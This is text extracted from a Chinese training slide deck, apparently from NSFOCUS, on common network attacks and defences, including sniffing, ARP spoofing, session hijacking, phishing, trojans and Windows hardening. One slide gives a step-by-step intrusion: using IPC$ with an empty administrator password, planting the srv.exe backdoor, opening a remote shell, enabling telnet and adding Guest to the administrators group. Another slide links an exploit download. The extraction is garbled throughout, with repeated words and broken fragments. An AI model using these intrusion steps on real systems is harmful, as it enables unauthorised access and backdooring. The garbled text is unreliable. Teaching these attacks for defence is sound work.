绿盟常见网络攻击与防范课件.ppt

1、l常见的网络攻击方法l常用的安全防范措施常见的网络攻击方法常见的网络攻击方法19801985199019952000密码猜测密码猜测可自动复制的代码可自动复制的代码密码破解密码破解利用已知的漏洞利用已知的漏洞破坏审计系统破坏审计系统后门后门会话劫持会话劫持擦除痕迹擦除痕迹嗅探嗅探包欺骗包欺骗GUI远程控制远程控制自动探测扫描自动探测扫描拒绝服务拒绝服务www 攻击攻击工具工具攻击者攻击者入侵者水平入侵者水平攻击手法攻击手法半开放隐蔽扫描半开放隐蔽扫描控制台入侵控制台入侵检测网络管理检测网络管理DDOS 攻击攻击2002高高采用采用漏洞漏洞扫描扫描工具工具选择选择会用会用的的方式方式入侵入侵获取

2、获取系统系统一定一定权限权限提提升升为为最最高高权权限限安装安装系统系统后门后门获取敏感信息获取敏感信息或者或者其他攻击目的其他攻击目的端口端口判断判断判断判断系统系统选择选择最简最简方式方式入侵入侵分析分析可能可能有漏有漏洞的洞的服务服务获取获取系统系统一定一定权限权限提提升升为为最最高高权权限限安装安装多个多个系统系统后门后门清除清除入侵入侵脚印脚印攻击其攻击其他系统他系统获取敏获取敏感信息感信息作为其作为其他用途他用途2001年中美黑客大战年中美黑客大战l事件背景和经过 4.1撞机事件为导火线 4月初，以PoizonB0 x、pr0phet为代表的美国黑客组织对国内站点进行攻击，约300

3、个左右的站点页面被修改 4月下旬，国内红（黑）客组织或个人，开始对美国网站进行小规模的攻击行动，4月26日有人发表了“五一卫国网战”战前声明，宣布将在5月1日至8日，对美国网站进行大规模的攻击行动。各方都得到第三方支援 各大媒体纷纷报道，评论，中旬结束大战中经网数据有限公司中经网数据有限公司中国科学院心理研究所中国科学院心理研究所国内某政府网站国内某政府网站国内某大型商业网站国内某大型商业网站国内黑客组织更改的网站页面国内黑客组织更改的网站页面美国劳工部网站美国劳工部网站美国某节点网站美国某节点网站美国某大型商业网站美国某大型商业网站美国某政府网站美国某政府网站这次事件中采用的常用攻击手法这次

4、事件中采用的常用攻击手法l红客联盟负责人在5月9日网上记者新闻发布会上对此次攻击事件的技术背景说明如下：“我们更多的是一种不满情绪的发泄，大家也可以看到被攻破的都是一些小站，大部分都是NT/Win2000系统，这个行动在技术上是没有任何炫耀和炒作的价值的。”l主要采用当时流行的系统漏洞进行攻击这次事件中被利用的典型漏洞这次事件中被利用的典型漏洞l用户名泄漏，缺省安装的系统用户名和密码l Unicode 编码可穿越firewall,执行黑客指令l ASP源代码泄露可远程连接的数据库用户名和密码l SQL server缺省安装l微软Windows 2000登录验证机制可被绕过l Bind 远程溢出

5、，Lion蠕虫l SUN rpc.sadmind 远程溢出，sadmin/IIS蠕虫 lWu-Ftpd 格式字符串错误远程安全漏洞l拒绝服务(syn-flood,ping)这次事件中被利用的典型漏洞这次事件中被利用的典型漏洞l用户名泄漏，缺省安装的系统用户名和密码入侵者利用黑客工具扫描系统用户获得用户名和简单密码这次事件中被利用的典型漏洞这次事件中被利用的典型漏洞lWindows 2000登录验证机制可被绕过l直接获取口令进入系统：网络监听，暴力破解l利用系统自身安全漏洞l特洛伊木马程序：伪装成工具程序或者游戏等诱使用户打开或下载，然后使用户在无意中激活，导致系统后门被安装lWWW欺骗：诱使用

6、户访问纂改过的网页l电子邮件攻击：邮件炸弹、邮件欺骗l网络监听：获取明文传输的敏感信息l通过一个节点来攻击其他节点：攻击者控制一台主机后，经常通过IP欺骗或者主机信任关系来攻击其他节点以隐蔽其入侵路径和擦除攻击证据l拒绝服务攻击和分布式拒绝服务攻击(D.o.S 和D.D.o.S)IP地址、主机是否运行、到要入侵点的路由、主机操作系统与用户信息等。Ping命令判断计算机是否开着，或者数据包发送到返回需要多少时间 Tracert/Tracerout命令跟踪从一台计算机到另外一台计算机所走的路径 Finger和Rusers命令收集用户信息 Host或者Nslookup命令，结合Whois和Finge

7、r命令获取主机、操作系统和用户等信息 应用的方法：应用的方法：获取网络服务的端口作为入侵通道。1.TCP Connect()2.TCP SYN3.TCP FIN4.IP段扫瞄5.TCP反向Ident扫瞄6.FTP代理扫瞄7.UDP ICMP不到达扫瞄7种扫瞄类型：种扫瞄类型：1.NSS（网络安全扫描器），可执行Sendmail、匿名FTP、NFS出口、TFTP、Host.equiv和Xhost等常规检查。2.Strobe(超级优化TCP端口检测程序)，可记录指定机器上的所有开放端口，快速识别指定机器上运行的服务，提示可以被攻击的服务。3.SATAN(安全管理员的网络分析工具)，SATAN用于扫

8、描远程主机，发现漏洞，包括FTPD漏洞和可写的FTP目录，NFS漏洞、NIS漏洞、RSH漏洞、Sendmail和X服务器漏洞等。4.Jakal扫描器，可启动而不完成TCP连接，因此可以扫描一个区域而不留下痕迹。5.IdengTCPscan扫描器，可识别指定TCP端口的进程的UID。扫瞄软件举例：扫瞄软件举例：原理：原理：sniffer类的软件能把本地网卡设置成工作在类的软件能把本地网卡设置成工作在“混杂混杂”（promiscuous）方式，使该网卡能接）方式，使该网卡能接收所有数据帧，从而获取别人的口令、金融帐号或收所有数据帧，从而获取别人的口令、金融帐号或其他敏感机密信息等。其他敏感机密信息

9、等。方法与对策：方法与对策：1 1、用交换机替换用交换机替换HUB，交换机是两两接通，比普，交换机是两两接通，比普通通HUB安全。安全。2 2、使用检测的软件，如、使用检测的软件，如CPM Antisniff等，检测等，检测网络中是否有网卡工作在混杂状态（基本原理是发网络中是否有网卡工作在混杂状态（基本原理是发送本网中并不存在的送本网中并不存在的MAC地址，看看是否有回应，地址，看看是否有回应，如有回应，则说明有计算机网卡工作在混杂模如有回应，则说明有计算机网卡工作在混杂模式。）。式。）。l1.C:net use x.x.x.xIPC$“”/user:“admintitrators”用流光扫到

10、的用户名是administrators，密码为“空”的IP地址l2.C:copy srv.exe x.x.x.xadmin$先复制srv.exe上去，在流光的Tools目录下l3.C:net time x.x.x.x 查查时间，发现x.x.x.x 的当前时间是 2003/3/19 上午 11:00，命令成功完成。4.C:at x.x.x.x 11:05 srv.exe 用at命令启动srv.exe吧（这里设置的时间要比主机时间推后）5.C:net time x.x.x.x再查查时间到了没有，如果x.x.x.x 的当前时间是 2003/3/19 上午 11:05，那就准备开始下面的命令。6.C:

11、telnet x.x.x.x 99 这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了l7.C:copy ntlm.exe 127.0.0.1admin$ntlm.exe也在流光的Tools目录中8.C:WINNTsystem32ntlm 输入ntlm启动（这里的C:WINNTsystem32是在对方计算机上运行当出现“DONE”的时候，就说明已经启动正常。然后使用“

12、net start telnet”来开启Telnet服务)9.Telnet x.x.x.x，接着输入用户名与密码就进入对方了为了方便日后登陆,将guest激活并加到管理组 10.C:net user guest/active:yes 11.C:net user guest 1234 将Guest的密码改为123412.C:net localgroup administrators guest/add 将Guest变为Administrator网络监听及防范技术网络监听及防范技术l网络窃听是指通过截获他人网络上通信的数据流，并非法从中提取重要信息的一种方法l间接性利用现有网络协议的一些漏洞来实现

13、，不直接对受害主机系统的整体性进行任何操作或破坏l隐蔽性网络窃听只对受害主机发出的数据流进行操作，不与主机交换信息，也不影响受害主机的正常通信网络监听及防范技术网络监听及防范技术共享式局域网下共享式局域网下l共享式局域网采用的是广播信道，每一台主机所发出的帧都会被全网内所有主机接收到l一般网卡具有以下四种工作模式：广播模式、多播模式、直接模式和混杂模式l网卡的缺省工作模式是广播模式和直接模式，即只接收发给自己的和广播的帧网络监听及防范技术网络监听及防范技术共享式局域网下共享式局域网下l使用MAC地址来确定数据包的流向若等于自己的MAC地址或是广播MAC地址，则提交给上层处理程序，否则丢弃此数据

14、l当网卡工作于混杂模式的时候，它不做任何判断，直接将接收到的所有帧提交给上层处理程序l共享式网络下窃听就使用网卡的混杂模式 网络监听及防范技术网络监听及防范技术共享式局域网下共享式局域网下网络监听及防范技术网络监听及防范技术交换式局域网下交换式局域网下l在数据链路层，数据帧的目的地址是以网卡的MAC地址来标识lARP协议实现的配对寻址 lARP请求包是以广播的形式发出，正常情况下只有正确IP地址与的主机才会发出ARP响应包，告知查询主机自己的MAC地址。l局域网中每台主机都维护着一张ARP表，其中存放着地址对。网络监听及防范技术网络监听及防范技术交换式局域网下交换式局域网下ARP改向的中间人窃

15、听A A发往发往B B：(MACb(MACb，MACaMACa，PROTOCOLPROTOCOL，DATA)DATA)B B发往发往A A：(MACa(MACa，MACbMACb，PROTOCOLPROTOCOL，DATA)DATA)A A发往发往B B：(MACx(MACx，MACaMACa，PROTOCOLPROTOCOL，DATA)DATA)B B发往发往A A：(MACx(MACx，MACbMACb，PROTOCOLPROTOCOL，DATA)DATA)网络监听及防范技术网络监听及防范技术交换式局域网下交换式局域网下lX分别向A和B发送ARP包，促使其修改ARP表l主机A的ARP表中B

16、为l主机B的ARP表中A为lX成为主机A和主机B之间的“中间人”网络监听及防范技术网络监听及防范技术网络窃听的被动防范网络窃听的被动防范l分割网段细化网络会使得局域网中被窃听的可能性减小 l使用静态ARP表手工输入地址对 l采用第三层交换方式取消局域网对MAC地址、ARP协议的依赖，而采用基于IP地址的交换l加密SSH、SSL、IPSec网络监听及防范技术网络监听及防范技术网络窃听的主动防范网络窃听的主动防范共享式局域网下的主动防范措施l伪造数据包构造一个含有正确目标IP地址和一个不存在目标MAC地址各个操作系统处理方式不同，一个比较好的MAC地址是FF-FF-FF-FF-FF-FEl性能分析

17、向网络上发送大量包含无效MAC地址的数据包，窃听主机会因处理大量信息而导致性能下降 网络监听及防范技术网络监听及防范技术网络窃听的主动防范网络窃听的主动防范交换式局域网下的主动防范措施l监听ARP数据包 监听通过交换机或者网关的所有ARP数据包，与预先建立的数据库相比较 l定期探测数据包传送路径 使用路径探测程序如tracert、traceroute等对发出数据包所经过的路径进行检查，并与备份的合法路径作比较l使用SNMP定期轮询ARP表 IPIP欺骗及防范技术欺骗及防范技术会话劫持会话劫持一般一般欺骗欺骗会话会话劫持劫持IPIP欺骗及防范技术欺骗及防范技术会话劫持会话劫持会话劫持攻击的基本步

18、骤l发现攻击目标l确认动态会话l猜测序列号关键一步，技术难点l使被冒充主机下线伪造FIN包，拒绝服务攻击l接管会话IPIP欺骗及防范技术欺骗及防范技术会话劫持会话劫持猜测序列号lTCP区分正确数据包和错误数据包仅通过它们的SEQ/ACK序列号 l选择恰当时间，在数据流中插入一个欺骗包，服务器将接受这个包，并且更新ACK序列号；然而客户主机仍继续使用老的SEQ序列号，而没有察觉我们的欺骗包IPIP欺骗及防范技术欺骗及防范技术防范技术防范技术l没有有效的办法可以从根本上防范会话劫持攻击l所有会话都加密保护实现困难l使用安全协议（SSH、VPN）保护敏感会话l对网络数据流采取限制保护措施被动措施电子

19、邮件欺骗及防范技术电子邮件欺骗及防范技术案例案例l2003年6月初，一些在中国工商银行进行过网上银行注册的客户，收到了一封来自网络管理员的电子邮件，宣称由于网络银行系统升级，要求客户重新填写用户名和密码。l这一举动随后被工行工作人员发现，经证实是不法分子冒用网站公开信箱，企图窃取客户的资料。l虽然没有造成多大的损失，但是这宗典型的电子邮件欺骗案例当时曾在国内安全界和金融界掀起了轩然大波，刺激人们针对信息安全问题展开了更加深切的讨论。电子邮件欺骗及防范技术电子邮件欺骗及防范技术原理原理l发送邮件使用SMTP（即简单邮件传输协议）lSMTP协议的致命缺陷：过于信任原则lSMTP假设的依据是：不怀疑

20、邮件的使用者的身份和意图l伪装成为他人身份向受害者发送邮件l可以使用电子邮件客户端软件，也可以远程登录到25端口发送欺骗邮件电子邮件欺骗及防范技术电子邮件欺骗及防范技术防范防范l查看电子邮件头部信息不仅指出了是否有人欺骗了电子邮件，而且指出了这个信息的来源 l采用SMTP身份验证机制使用与POP协议收取邮件时相同的用户名/密码lPGP邮件加密以公钥密码学（Public Key Cryptology）为基础的 WebWeb欺骗及防范技术欺骗及防范技术概念概念l人们利用计算机系统完成具有安全需求的决策时往往是基于屏幕的显示 页面、URL图标、图片时间的先后顺序l攻击者创造一个完整的令人信服的Web

21、世界，但实际上它却是一个虚假的复制 l攻击者控制这个虚假的Web站点，受害者浏览器和Web之间所有网络通信完全被攻击者截获 WebWeb欺骗及防范技术欺骗及防范技术概念概念WebWeb欺骗及防范技术欺骗及防范技术原理原理URL地址改写http:/http:/ http:/ WebWeb欺骗及防范技术欺骗及防范技术原理原理隐藏纰漏l由于JavaScript能够对连接状态栏写操作，而且可以将JavaScript操作与特定事件绑定在一起。l攻击者完全可以将改写的URL状态恢复为改写前的状态。lJavaScript、ActiveX等技术使Web欺骗变得更为可信。WebWeb欺骗及防范技术欺骗及防范技术

22、防范技术防范技术l检查页面的源代码l禁用JavaScrip、ActiveX等脚本语言l确保应用有效和能适当地跟踪用户会话ID 使用尽可能长的随机数l教育是非常重要的方法与对策方法与对策：1 1、限制同一用户的失败登录次数、限制同一用户的失败登录次数2 2、限制口令最短长度，要求特权指令使用复杂的字、限制口令最短长度，要求特权指令使用复杂的字母、数字组合。母、数字组合。3 3、定期更换口令，不要将口令存放到计算机文件中、定期更换口令，不要将口令存放到计算机文件中 1口令暴力攻击：口令暴力攻击：生成口令字典，通过程序试探口令。生成口令字典，通过程序试探口令。2窃取口令文件后解密：窃取口令文件后解密

23、：窃取口令文件（窃取口令文件（UNIX环境下的环境下的Passwd文件和文件和Shadow文文件）件），通过软件解密。，通过软件解密。原理：1.有些CGI程序只是简单地进行传递，不对内容进行过滤，攻击者就可能通过页面提交带有危险指令的脚本代码提交给机器去执行。2.有些CGI能够过滤一些特征数据，但是有些攻击者故意制作一些混乱的字符串骗过检测（如使用退格字符）。3.有些管理员把CGI所在的目录设置为可写的，那么攻击者不仅可以修改替换页面，而且也可以通过新脚本为所欲为。对策：严格设置CGI脚本权限，采用安全的CGI。漏洞1：对使用的端口号没有任何限制，可以使用TCP提供给其他服务的任意端口，这就使

24、攻击者利用FTP攻击其他服务。FTP服务器被当作攻击武器使用了。防范措施是设置服务器最好不要建立端口号在防范措施是设置服务器最好不要建立端口号在10241024以下的连接，其次禁止以下的连接，其次禁止FTPFTP代理。代理。漏洞2：FTP标准允许无限次输入密码。防范措施防范措施是建议服务器限制尝试输入正确指令的次数，另外在是建议服务器限制尝试输入正确指令的次数，另外在一次登录失败后应暂停几秒来削减暴力攻击的有效性。一次登录失败后应暂停几秒来削减暴力攻击的有效性。漏洞3：分配端口号时，通常按增序分配。防范防范措施是措施是 在在c c语言中，下面程序将造成缓冲区溢出：语言中，下面程序将造成缓冲区溢

25、出：char buffer10;char buffer10;strcpy(buffer,strstrcpy(buffer,str););或者或者Sprintf(buffer,”thisSprintf(buffer,”this is a test.”);is a test.”);后果：后果：普通的缓冲区溢出并不会产生安全问题，只有将溢出送到能够以普通的缓冲区溢出并不会产生安全问题，只有将溢出送到能够以rootroot权限运行命令的区域才会产生危害，最常见的方法是在溢出区域运行权限运行命令的区域才会产生危害，最常见的方法是在溢出区域运行一个一个shellshell，再通过，再通过shellshel

26、l执行其他的命令。执行其他的命令。对策：经常注意升级版本或下载补丁。对策：经常注意升级版本或下载补丁。例如：例如：IISIISISAPIISAPI.Printer.Printer的缓冲区溢出的缓冲区溢出攻击软件：攻击软件：http:/ http:/www.sunx.org/mysoft/iishack.ziphttp:/www.sunx.org/mysoft/iishack.zip补丁：补丁：http:/ 远程控制型 输出shell型 信息窃取型 其它类型lNetBus使用TCP建立会话。缺省情况下用12345端口进行连接，12346端口进行数据传输l跟踪NetBus的活动比较困难。l可以通过

27、检查12346端口数据来确定l许多类似的程序使用固定的端口，你可以扫描整个的网络监测可疑的活动。l简单方法netstat-anl可穿透防火墙，控制局域网机器l服务器端主动发起连接，控制端监听80端口l自动上线通知 Email发送 读取主页空间的某个文件l网络神偷、灰鸽子、魔法控制l解决方法 安装防病毒软件和个人防火墙 检查可疑的进程和监听端口 提高安全警惕性TelnetSMTPDNSFTPUDPTCPIP以太网以太网无线网络无线网络SATNETARPNET应用程序攻击拒绝服务攻击数据监听和窃取硬件设备破坏电磁监听WorkstationVia EmailFile ServerWorkstatio

28、nMail ServerInternet混合型攻击:蠕虫Web ServerVia Web PageWorkstationWeb ServerMail Gateway防病毒防病毒防火墙防火墙入侵检测入侵检测风险管理风险管理l漏洞趋势 严重程度中等或较高的漏洞急剧增加,新漏洞被利用越来越容易(大约60%不需或很少需用代码)l混合型威胁趋势 将病毒、蠕虫、特洛伊木马和恶意代码的特性与服务器和 Internet 漏洞结合起来而发起、传播和扩散的攻击,例：红色代码和尼姆达等。l主动恶意代码趋势 制造方法：简单并工具化 技术特征：智能性、攻击性和多态性,采用加密、变换、插入等技术手段巧妙地伪装自身，躲避

29、甚至攻击防御检测软件.表现形式：多种多样,没有了固定的端口，没有了更多的连接,甚至发展到可以在网络的任何一层生根发芽，复制传播，难以检测。l受攻击未来领域 即时消息：MSN,Yahoo,ICQ,OICQ等 对等程序(P2P)移动设备常见的安全防范措施常见的安全防范措施l物理层l网络层 路由交换策略 VLAN划分 防火墙、隔离网闸 入侵检测 抗拒绝服务 传输加密l系统层 漏洞扫描 系统安全加固 SUS补丁安全管理l应用层 防病毒 安全功能增强l管理层 独立的管理队伍 统一的管理策略 访问访问控制控制 认证认证 NAT 加密加密 防病毒、内容防病毒、内容过滤过滤 流量管理流量管理 Firewall

30、 FirewallServersDMZDMZIDS AgentIntranetIntranet监控中心监控中心router攻击者攻击者发现攻击发现攻击发现攻击发现攻击发现攻击发现攻击报警报警报警报警IDS Agent地方网管地方网管scanner监控中心监控中心地方网管地方网管地方网管地方网管地方网管地方网管地方网管地方网管市场部市场部工程部工程部routerouter r开发部开发部ServersServersFirewallFirewalll基本安全配置检测和优化l密码系统安全检测和增强l系统后门检测l提供访问控制策略和工具l增强远程维护的安全性l文件系统完整性审计l增强的系统日志分析l系

31、统升级与补丁安装l使用Windows update安装最新补丁；l更改密码长度最小值、密码最长存留期、密码最短存留期、帐号锁定计数器、帐户锁定时间、帐户锁定阀值，保障帐号以及口令的安全；l卸载不需要的服务；l将暂时不需要开放的服务停止；l限制特定执行文件的权限；l设置主机审核策略；l调整事件日志的大小、覆盖策略；l禁止匿名用户连接；l删除主机管理共享；l限制Guest用户权限；l安装防病毒软件、及时更新病毒代码库；l安装个人防火墙。l使用Windows update安装最新补丁；l更改密码长度最小值、密码最长存留期、密码最短存留期、帐号锁定计数器、帐户锁定时间、帐户锁定阀值，保障帐号以及口令的

32、安全；l将默认Administrator用户和组改名，禁用Guests并将Guest改名；l开启安全审核策略；l卸载不需要的服务；l将暂时不需要开放的服务停止；l限制特定执行文件的权限；l调整事件日志的大小、覆盖策略；l禁止匿名用户连接；l删除主机管理共享；l安装防病毒软件、个人防火墙。l限制空连接HKEY_Local_MACHINESystemCurrentControlSetServicesLanManServerParameters键值：RestrictNullSessAccess类型：REG_DWORD数值：1l限制来宾和空登陆身份查看事件日志HKEY_Local_MACHINESys

33、temCurrentControlSetServicesEventLogApplication Security System键值：RestrictGuestAccess类型：REG_DWORD数值：1l限制服务器显示在网络列表中HKEY_Local_MACHINESystemCurrentControlSetServicesLanManServerParameters键值：hidden类型：REG_DWORD数值：1l审核备份还原时间HKEY_Local_MACHINESystemCurrentControlSetControlLsa键值：FullPrivilegeAuditng类型：REG_DWORD数值：1l不显示最后登陆名HKEY_Local_MACHINESoftwareMicrosoftWindowsNTCurrentVersionWinlogon键值：DontDisplayLastUserName类型：REG_SZ数值：1l限制匿名用户列举用户和共享信息HKEY_Local_MACHINESystemCurrentControlSetControlLsa键值：RestrictAnonymous类型：REG_DWORD数值：1l删除为管理员而设计的共享(C$,ADMIN$)键值：AutoShareServer类型：REG_DWORD数值：1